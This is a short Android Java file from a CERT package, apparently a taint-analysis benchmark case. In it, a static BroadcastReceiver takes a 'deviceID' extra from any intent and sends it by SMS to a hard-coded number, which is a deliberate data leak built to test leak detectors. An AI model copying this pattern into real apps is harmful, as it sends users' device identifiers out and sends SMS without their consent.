package org.cert.broadcastrx_static;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsManager;

public class MyBroadcastReceiver_Static extends BroadcastReceiver {

	@Override
	public void onReceive(Context context, Intent intent) {
		Bundle extras = intent.getExtras();
		if (extras != null) {
			if(extras.containsKey("deviceID")){
				try {
					SmsManager smsManager = SmsManager.getDefault();
					smsManager.sendTextMessage("1234567890", null, 
							extras.get("deviceID").toString(), null, null); // A Sink to SMS
				} catch (Exception e) {
					e.printStackTrace();
				}
			}
		}
	}
}